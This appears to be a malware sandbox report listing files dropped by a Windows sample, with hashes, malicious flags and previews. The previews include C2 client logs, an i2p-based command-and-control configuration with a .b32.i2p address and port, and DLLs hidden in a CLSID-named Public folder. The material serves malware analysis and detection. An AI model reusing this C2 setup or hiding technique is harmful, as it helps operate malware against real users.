                                                                                                                Encrypted:false
                                                                                                                SSDEEP:768:dPl4NwUHNZrLa4VqesSC92Kt2GdKlcwkVzW21tvTVin5tKpl2shiWZ7m2dQzKLOn:dPaJOINKQ6pD4n9
                                                                                                                MD5:9113770526C65C25CBF53DAFBEB742C1
                                                                                                                SHA1:58FF5D6B1142CECC626057E8AC2B5C5479E124CD
                                                                                                                SHA-256:FB7489A510CE1A61F1FEDDD07E5B4A01B7E0C3C48AE1076253EF220B8F36B4D4
                                                                                                                SHA-512:0F79904772D75EF75BF7B0B0BDE129BBCA30FE6646DD921FB68ACD9CE5080ADE13FC6D4B8EE45F6E88B0D2B348E44DD4E216104DBCF5878322914C0670FC12CE
                                                                                                                Malicious:false
                                                                                                                Preview:MDMP..a..... .......(<.g............$...........(...8...........` ..........h...........`.......8...........T...........(....j..........\!..........H#..............................................................................eJ.......#......Lw......................T.......`....<.g.............................@..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):6706
                                                                                                                Entropy (8bit):3.7215090046866637
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:RSIU6o7wVetb1E0d9eYHV40Xh5aM4UB89bSeDgUfnmm:R6l7wVeJ1EVYHZprB89bSeFfnmm
                                                                                                                MD5:82345A462558A62672C2C75D6B4A047E
                                                                                                                SHA1:A86261D43F6757A0388FF833A368A3A69AFB6E37
                                                                                                                SHA-256:506D1BC3DB2E706F8E15939E085A9EADF606B3C417476407B18E166C520ECC1D
                                                                                                                SHA-512:AD46F9AC7EDC95C67EE195AA03C7DD93A36A8C9507D3D084A37A1344811691E5218D6935C124936ADEEEBA57B9C9ED611044427375F4E2770F0C995A908B914C
                                                                                                                Malicious:false
                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.6.5.6.<./.P.i.
                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):4603
                                                                                                                Entropy (8bit):4.411656164499835
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:cvIwWl8zs9rJg771I9RWWpW8VYgYm8M4JD2+AFXyq85/3Tg4p3Yibd:uIjf9FI7G37VkJAKgY3Yibd
                                                                                                                MD5:1B94EBB13739A9F843AE325FEDB2CD71
                                                                                                                SHA1:125384DE1FBF469A4C5C68BB5E47841A4ACC46D1
                                                                                                                SHA-256:C4A43D83266D3FD583AD1C5BE7E31E2C3C55E0E9449FC0A2000B029077B6545C
                                                                                                                SHA-512:1DA53E07D1364E510D1EB9CA7DA5392E0504B7B4F012F34A85A067BCF3301E03618BCBB1C0DD59E6B57005F09FCBF28C542CA78E059402DD8B200645E7CB8868
                                                                                                                Malicious:false
                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="538917" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):78902
                                                                                                                Entropy (8bit):3.0940774677149414
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:J4K5VtjFIZ0cM7x4rlSVgZwb0s0QnaLI+wM:J4K5VtjFIZ0cM7x4rlSVgZwb0s0QnQIW
                                                                                                                MD5:CE8315AA6AA5C5687472EA302DB22AF6
                                                                                                                SHA1:17F53B5DACA9E46454AD3B3AE23B131850BDFFE4
                                                                                                                SHA-256:AFDFE71EC441C20D333DCC634713A1C3823B6A6921A22000AA12121D9D14AF93
                                                                                                                SHA-512:3A3181617E45FF900B4AB1195443BA0426B55204DF5F444C9C48849FD69877CC8970B3AB2D48BC2D0A02070673A70A47C2E532384A91B33080467BF5B473DFB4
                                                                                                                Malicious:false
                                                                                                                Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):13340
                                                                                                                Entropy (8bit):2.6866623956122084
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:TiZYW9i0HG8nYpYiVW6HAUYEZ7dtNiUIXHNwvkzDFa964MqwKIHw3:2ZDVOJdWFa964Mqw9Hw3
                                                                                                                MD5:4233619CA1CE1C809D6AF5D42223F8F6
                                                                                                                SHA1:C6B19111FFCA68AD086359C14966BC8C8CA6872F
                                                                                                                SHA-256:557F1C8F6F3D9093716C86786A7DA45AAA670DC8DDA7C33450C9660E83E91A83
                                                                                                                SHA-512:D850EDD9119F48C8E422DA2AEE75B15CC1EE20995DEE869526BC0B9137FFB4A597C29B02F31477681634B4576190ED674BB403B5B07DC4DF325AE93891AA57EC
                                                                                                                Malicious:false
                                                                                                                Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                Process:C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):456
                                                                                                                Entropy (8bit):3.2341395630162877
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:Ml8Pi7t8+d/fQfjfEWNfElsfghFfShFfgmSem4emzYWr:k8APd/oj8i8ls0FSFgID7r
                                                                                                                MD5:40AB00517F4227F2C3C334F1D16B65B4
                                                                                                                SHA1:F8D57AF017E2209B4FB24122647FD7F71B67C87C
                                                                                                                SHA-256:4BAF4B78D05A28AF7DEE7DBBCE2B4EDF6053D9239C1756C932BE9F2FEEE4EF85
                                                                                                                SHA-512:75D74306F043B864295F09A60C19A43494C226664733C99318989CE5C22CB9395BB407FB5C8C0268AD9184A79813304ED5FC943A6B53DB54F5F225CDA31650E3
                                                                                                                Malicious:false
                                                                                                                Preview:C.o.m.p.u.t.e.r...{.2.0.d.0.4.f.e.0.-.3.a.e.a.-.1.0.6.9.-.a.2.d.8.-.0.8.0.0.2.b.3.0.3.0.9.d.}.....D.:.A.I.(.D.;.;.F.A.;.;.;.B.U.).(.A.;.;.F.A.;.;.;.B.A.).(.A.;.O.I.C.I.I.D.;.F.A.;.;.;.B.A.).(.A.;.I.D.;.F.A.;.;.;.S.Y.).(.A.;.O.I.C.I.I.O.I.D.;.F.A.;.;.;.C.O.).(.A.;.O.I.C.I.I.O.I.D.;.F.A.;.;.;.S.Y.).(.A.;.O.I.C.I.I.D.;.0.x.1.3.0.1.f.f.;.;.;.I.U.).(.A.;.O.I.C.I.I.D.;.0.x.1.3.0.1.f.f.;.;.;.S.U.).(.A.;.O.I.C.I.I.D.;.0.x.1.3.0.1.f.f.;.;.;.S.-.1.-.5.-.3.).....
                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):115200
                                                                                                                Entropy (8bit):6.220212606349767
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:GQTj0nA3CwwEWLUbltMR8tGZ9G+Yv953a6nfgXqobk5l:GQP02C7LUbltdQG+Yra64Xqo45l
                                                                                                                MD5:BE6174AE2B452DA9D00F9C7C4D8A675B
                                                                                                                SHA1:0ABD2C76C82416AE9C30124C43802E2E49C8ED28
                                                                                                                SHA-256:A62BDF318386AAAB93F1D25144CFBDC1A1125AAAD867EFC4E49FE79590181EBF
                                                                                                                SHA-512:5631B1595F8CEE8C0DFA991852259FEE17EA8B73A9EED900A10450BBB7C846ACFC88C32930BE379D60EFA6AE1BBBEAD0A605A9F36E20129B53BCA36B13BA5858
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Joe Sandbox View:
                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........."h.............................P......7F....`... .........................................^....................................@..l...........................@...(.......................h............................text...(...........................`..`.data........0......................@....rdata..`d...@...f...(..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..l....@......................@..B........................................................................................................................................................................
                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):3012
                                                                                                                Entropy (8bit):5.5536054899701774
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:CFdHW54yclDYcm9FLnvU4bcPPu4bcPPTM94bcPPZ4bcPPA4bcPPL4bcPPcWIe18J:idH9NYJ9Vv3YPpYPTNYP6YPTYPcYPV3a
                                                                                                                MD5:61A42BC544FC81E6511B6B8F991458C2
                                                                                                                SHA1:ED948623EB0777AE8612B70B99E54E53B808DAAE
                                                                                                                SHA-256:C812464D10B3FF2362E37C04FF0DBC7974BC88EA9962BF360407712CB199DDAF
                                                                                                                SHA-512:EF203003D86885D42772B89D52B7DE0531ADB00B31A973D89FD812D65E756CB43617AFC47F8EF2CD6B25357ADF4BD3A8675983DB17BBDB170F6354AB7B57E7AA
                                                                                                                Malicious:false
                                                                                                                Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=88d241f9)..[I] (sys_init) -> Done(sys_uid=c76a8f0888d241f9,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[D] (ini_get_sec) -> Done(name=cnccli)..[D] (ini_get_var) -> Done(sec=cnccli,name=server_host,value=c
                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                File Type:Generic INItialization configuration [cnccli]
                                                                                                                Category:dropped
                                                                                                                Size (bytes):214
                                                                                                                Entropy (8bit):5.0997449470012635
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6:1EVQLD4oeMuJO+70X1YIzODSVkXpTRL9gWVUDeLn:CjogJO+70X1YeCS2X9vgpKL
                                                                                                                MD5:26702FAAB91B6B144715714A96728F39
                                                                                                                SHA1:CBDC34FC8FD3559CD49475FB5BC76176A5F88FF8
                                                                                                                SHA-256:83D30846DD5576DE38A512B17163419D22FF35F2F5B0FE613C401E8A5A25B7A4
                                                                                                                SHA-512:50D35D3DCD60B6E57C1A277E6C3E7AFBB5C2B46425732FC5A9FD3C0A55FEBF5AB3F05411A83CEC230AAC40199774FF78F30848D57D1E04A11B9E60777B038289
                                                                                                                Malicious:false
                                                                                                                Preview:[main]..version=400004957b19a09d..[cnccli]..server_host=c21a8709..server_port=41674..server_timeo=15000..i2p_try_num=10..i2p_sam3_timeo=30000..i2p_addr=2lyi6mgj6tn4eexl6gwnujwfycmq7dcus2x42petanvpwpjlqrhq.b32.i2p..
                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):104448
                                                                                                                Entropy (8bit):6.259370376612282
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:VQbC3TviBZTprAFnfkRAJhzTjvlsy2nD+cRi6ZQOobsAx34:VGC3TKBZTWJfImTjx2D+ei6ZQOkx34
                                                                                                                MD5:7A8E8A0842D8D65713DEE5393E806755
                                                                                                                SHA1:AF6F3A52009FBF62C21A290EFC34A94C151B683E
                                                                                                                SHA-256:51C131081921626D22FAF44977D5E4DCFE00E5D6CDDEDA877A82F13631BE7C2E
                                                                                                                SHA-512:D1B8D93B7EFBEAA348D3A01293AD5D92BC8F28EB2554DF5E6E71506D00D135390082C52C18D0BC3F0439B068777D8B2C43AAED930C72E5FFAB2593EEAC470CF4
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Joe Sandbox View:
                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\.........?..............................0............`... .........................................^.......................$............ ..l............................v..(.......................`............................text...............................`..`.data...............................@....rdata...a... ...b..................@..@.pdata..$............h..............@..@.xdata..T............r..............@..@.bss.... ................................edata..^............|..............@..@.idata...............~..............@....CRT....X...........................@....tls................................@....reloc..l.... ......................@..B........................................................................................................................................................................
                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1021
                                                                                                                Entropy (8bit):5.4493116829156865
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:CFAGHS+5lGyclY7Gfy6BgT7cRE9FLxJ7J10ERJSXYSae:CFdHS+54yclDYcm9FLnve/P
                                                                                                                MD5:6A6AB43E13FCE620F7B67A2D6A1EA80F
                                                                                                                SHA1:9141481607A0C59B6046B55A658E849E8B7D09A7
                                                                                                                SHA-256:B35C950564E3CCC7F4597B45622D5577317FA02477F4534D8E7D086194BAA3AA
                                                                                                                SHA-512:D7BC58491070BF47ABC2FF7DB02CD2BFCEB86E1B7910C2DFD91D4AC0E416C5659A107E9C916B217C71B471D5A3A7F65D6C4780B749530FEB12AEC87B0E6BE46C
                                                                                                                Malicious:false
                                                                                                                Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=88d241f9)..[I] (sys_init) -> Done(sys_uid=c76a8f0888d241f9,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ffe1a4fb070)..[I] (tcp_connect) -> Done(sock=0x374,host=7
                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):92672
                                                                                                                Entropy (8bit):6.242846530333761
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:Eb84+EBwpVmTx3sJg0jsEv5YqKnbGGOO5YhNDE:Eb84+EB7x3sJXwExKb/OOv
                                                                                                                MD5:FDCF93ACD089B505B524DDFA0FF947F9
                                                                                                                SHA1:A2BADA5807BA001758DBCE46DA634332A5CC14C2
                                                                                                                SHA-256:ADFE373F98CABF338577963DCEA279103C19FF04B1742DC748B9477DC0156BB4
                                                                                                                SHA-512:110455DC5C3F090A1341EE6D09D9B327CD03999C70D4A2C0B762B91BC334B0448E750CB1FD7B34CE729B8E1CD33B55A4E1FA1187586C2FF8850B2FD907AFE03E
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(.....f......\.........Io....................................C.....`... .........................................^....................`..................l............................J..(....................................................text...............................`..`.data...............................@....rdata...U.......V..................@..@.pdata.......`.......<..............@..@.xdata.......p.......F..............@..@.bss....`................................edata..^............P..............@..@.idata...............R..............@....CRT....X............d..............@....tls.................f..............@....reloc..l............h..............@..B........................................................................................................................................................................
                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):4426
                                                                                                                Entropy (8bit):5.441438388687585
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:CFdHs54yclDYcm9FLnvzBMcwaE9uEM5EF9cCEqPEQHdQ2:idHrNYJ9VvzBt5EsEyEQCEOEoQ2
                                                                                                                MD5:578161E59E49171D339579DDFFE2A1C1
                                                                                                                SHA1:18F9FA30F9988189ED2330E95499102210A47A39
                                                                                                                SHA-256:2EAF3A50B35C8B6E707970404C7464F5D445FB6F863DCF3B5EC8F5E26EFD775E
                                                                                                                SHA-512:E4BE4A2E41C10AE5183F35E2691CE2C68DF90E6770333638B9FA0BBD0484494E53CF86B2AC1C63E5D3C91551E97B052CA6677AB22F86792E20A724BBAD0E412E
                                                                                                                Malicious:false
                                                                                                                Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=88d241f9)..[I] (sys_init) -> Done(sys_uid=c76a8f0888d241f9,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (server_init) -> CreateThread(routine_gc) done..[I] (server_init) -> CreateThread(routine_accept) done..[I] (server_init)
                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                File Type:ASCII text
                                                                                                                Category:dropped
                                                                                                                Size (bytes):8568
                                                                                                                Entropy (8bit):4.958673415285098
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:e+I8WTr7LjdL33ZqPDNLWBsaBMG+xv9G86UJ5TMmyvmyLKkfUZleZnE/Ndm/7CIg:e+I8Mr7VtXl1zrrIqEVdm/7CItWR0SX
                                                                                                                MD5:27535CEE6740DFC50A78A0322415E67C
                                                                                                                SHA1:E80541CF15C8ED4C5EEDA8D8C24674A5B8A27F61
                                                                                                                SHA-256:FB0CDBF4E0215AE1866E97860C2AC3DD96E7498BFE2AF3D82378041CDFF7F292
                                                                                                                SHA-512:25F11A8262B5A2F59BD6C9D8673B5AD5A140EAE8C007244810B2924EB08B5CF54AE19E61BE5139319877278D11868BBD85BD2E6C67F5FAD4E2A458E2844EBC0C
                                                                                                                Malicious:false
                                                                                                                Preview:## Configuration file for a typical i2pd user.## See https://i2pd.readthedocs.io/en/latest/user-guide/configuration/.## for more options you can use in this file...## Lines that begin with "## " try to explain what's going on. Lines.## that begin with just "#" are disabled commands: you can enable them.## by removing the "#" symbol...## Tunnels config file.## Default: ~/.i2pd/tunnels.conf or /var/lib/i2pd/tunnels.conf.# tunconf = /var/lib/i2pd/tunnels.conf..## Tunnels config files path.## Use that path to store separated tunnels in different config files..## Default: ~/.i2pd/tunnels.d or /var/lib/i2pd/tunnels.d.# tunnelsdir = /var/lib/i2pd/tunnels.d..## Path to certificates used for verifying .su3, families.## Default: ~/.i2pd/certificates or /var/lib/i2pd/certificates.# certsdir = /var/lib/i2pd/certificates..## Where to write pidfile (default: /run/i2pd.pid, not used in Windows).# pidfile = /run/i2pd.pid..## Logging configuration section.## By default logs go to stdout with level 'inf
                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):62449
                                                                                                                Entropy (8bit):7.807149241969407
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:uzSVMhnCwJEZ4dJ4douBYaGGIW2QzPzp343mR:vKE29uBFBo2R
                                                                                                                MD5:688FDFAE15F328A84E8F19F8F4193AF2
                                                                                                                SHA1:C65D4CDA0C93B84154DFBC065AE78B9E2F7ECFA8
                                                                                                                SHA-256:8D37FF2458FDE376A41E9E702A9049FF89E78B75669C0F681CFCAFBA9D49688E
                                                                                                                SHA-512:F19BC7F204DBE3449ABE9494BFFF8BE632F20F1B4B8272F0AF71C4CEC344A20617C0909C024CB4A4E0C6B266D386CB127554DC70F3A6AA7A81DAF1A8748F5D2D
                                                                                                                Malicious:false
                                                                                                                Preview:I2Psu3.................................1726476901......reseed@cnc.netPK.........E0Y.L.`........;...routerInfo-CVE7qh1P~hZ~PX2FDY6wRTmrdDd1eQ5Nv7yBC0EcH-o=.dat.^...)....?E4T{w...U........5.x.Z*T.v...C..~m.....r.u.._..0*._>a....B.......1in..o...R...M.....2.0..1...?.&..1@.._.s....KrbA.-..5c..Nzvep.KU.s.n...Gy.E.y...GU.c..A.i.[HU..{I@v..5c.-..53....5..f Kpp..c....:.N..I..u..~~..u....%a........~F>.&.9..I..........\..Ff&..f...!CL!#.!....[.3..:.......J....:..DO...B.l.\gc....r...P__W[..C[......_.d#wG.t....ts.rG. .R.@...b....*c..t..#[...l......D.....<.0...B. ].4...P....(...J...>2.02243....}dll`aan`bj...................%...F..~Q......>....If.a..%..!...E......@...BD...d:..!.b'sDZ.5k^j.g.H\..JI..../..IM,N.N-.:..Z.I"(..$............+..e.....Y..[_...U....t.....n8CEbM...k.%W.^....`i..&[.Y.{}...d.Vn.g..0...PK.........>0Y....:.......;...routerInfo-7xGNdz1Bi17~K7q9lFTjGVPnQdN0tqNJ-xpZt5MSp1Q=.dat{lr...~./..<Yw_...".....%..E.....O..l.(.R<K^...>.i..{.D.s-.+...
                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):512
                                                                                                                Entropy (8bit):7.606542147798873
                                                                                                                Encrypted:false
